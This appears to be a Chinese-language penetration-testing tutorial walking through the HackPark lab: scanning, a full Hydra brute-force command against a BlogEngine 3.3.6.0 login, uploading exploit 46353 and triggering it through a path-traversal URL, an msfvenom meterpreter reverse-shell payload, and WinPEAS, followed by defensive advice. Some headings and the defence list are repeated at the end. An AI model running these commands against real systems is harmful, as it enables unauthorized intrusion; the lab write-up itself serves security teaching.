HackPark渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用RustScan进行快速端口扫描：<\/p>

rustscan -a <目标IP> --range 0-65535 -- -sV -oN hackpark.nmap
<\/span><\/span><\/code><\/pre>或者使用Nmap进行详细扫描：<\/p>
nmap -Pn -sC -sV -sS -p- <目标IP>
<\/span><\/span><\/code><\/pre>1.2 Web应用识别<\/h3>

访问80端口发现小丑图片<\/li>
使用Google识图确认是Pennywise(小丑回魂)图片<\/li>
检查网站版本信息：BlogEngine Version 3.3.6.0<\/li>
<\/ul>
2. 暴力破解登录<\/h2>
2.1 寻找登录入口<\/h3>

检查主页选项选项卡中的登录选项<\/li>
右键点击登录表单检查元素，获取表单请求方法(POST)<\/li>
使用Burp Suite拦截流量分析POST参数<\/li>
<\/ul>
2.2 Hydra暴力破解配置<\/h3>
使用Hydra进行暴力破解的命令：<\/p>
hydra -s 80<\/span> -l admin -P \/usr\/share\/wordlists\/rockyou.txt <目标IP> http-post-form "\/Account\/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=tH3nyjHWshy31CD1HUL212Q2sUlmbJdmA3PH9QrQ49rHSGqip79fK8fK5w4R7A%2BFv2G31xXxSwbuy6esy7JCppaHYfeaUtqtFg4aegSGfDLkkKfhuVa81dv5v2mFDlGJ1If8gDK4WByANbsudxOHKaJxujKDU8OBewkI6AFhnRNcbUma&__EVENTVALIDATION=oztmFtnEAgIEFOmV8sjMAU%2BW5%2BIFfkBcHNipRMg%2FufY3Fjp8pw8gZaDh4fKcBwNZYLmHVX0EIOBoThym43y1HuSP9JPodblTBkUym%2F4InzzxcNfFcy00UcAjFbfzsef8VMHNFfXOxlLnJqSLDO34qyWBaSkrdN5QnpX%2BzDvzCkb0Q3ek&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"<\/span>
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-s 80<\/code>: 指定端口<\/li>
-l admin<\/code>: 指定用户名<\/li>
-P rockyou.txt<\/code>: 密码字典<\/li>
http-post-form<\/code>: 指定POST表单攻击<\/li>
最后部分是表单数据和失败响应标识<\/li>
<\/ul>
3. 漏洞利用<\/h2>
3.1 查找漏洞<\/h3>
使用searchsploit查找BlogEngine 3.3.6.0的漏洞：<\/p>
searchsploit BlogEngine 3.3.6.0
<\/span><\/span><\/code><\/pre>发现3个RCE漏洞，选择其中一个(46353)：<\/p>
searchsploit -m aspx\/webapps\/46353.cs
<\/span><\/span><\/code><\/pre>3.2 准备漏洞利用文件<\/h3>

将漏洞利用代码重命名为"PostView.ascx"<\/li>
修改代码中的IP和端口为攻击机监听地址<\/li>
以管理员身份登录后：

点击"内容"->"帖子"->"欢迎来到Hackpark"->"文件管理器"<\/li>
点击"上传"，上传PostView.ascx文件<\/li>
<\/ul>
<\/li>
<\/ol>
3.3 触发漏洞<\/h3>
访问以下URL触发RCE：<\/p>
http:\/\/<目标IP>\/?theme=..\/..\/App_Data\/files
<\/code><\/pre>
同时设置Netcat监听：<\/p>
nc -lvnp <监听端口>
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 建立稳定反向shell<\/h3>
使用msfvenom创建payload：<\/p>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><攻击机IP> LPORT=<\/span>1234<\/span> -e x64\/shikata_ga_nai -f exe -o reverse.exe
<\/span><\/span><\/code><\/pre>通过已获得的shell上传并执行reverse.exe<\/p>
4.2 使用WinPEAS进行权限提升检查<\/h3>
上传并运行WinPEAS工具，检查系统漏洞和配置问题：<\/p>
.\winpeas.exe
<\/span><\/span><\/code><\/pre>5. 关键点总结<\/h2>

信息收集<\/strong>：全面扫描和版本识别是成功的基础<\/li>
暴力破解<\/strong>：需要准确获取表单结构和参数<\/li>
漏洞利用<\/strong>：必须精确匹配应用版本和漏洞<\/li>
权限维持<\/strong>：从临时shell升级到稳定meterpreter会话<\/li>
权限提升<\/strong>：使用WinPEAS等工具系统化寻找提权路径<\/li>
<\/ol>
6. 防御建议<\/h2>

使用强密码策略防止暴力破解<\/li>
及时更新应用版本修补已知漏洞<\/li>
限制文件上传类型和目录权限<\/li>
实施最小权限原则<\/li>
监控异常网络连接和进程行为<\/li>
<\/ol>

HackPark渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 暴力破解登录<\/h2>

3. 漏洞利用<\/h2>

4. 权限提升<\/h2>

6. 防御建议<\/h2> 使用强密码策略防止暴力破解<\/li> 及时更新应用版本修补已知漏洞<\/li> 限制文件上传类型和目录权限<\/li> 实施最小权限原则<\/li> 监控异常网络连接和进程行为<\/li> <\/ol>

6. 防御建议<\/h2>

使用强密码策略防止暴力破解<\/li>
及时更新应用版本修补已知漏洞<\/li>
限制文件上传类型和目录权限<\/li>
实施最小权限原则<\/li>
监控异常网络连接和进程行为<\/li> <\/ol>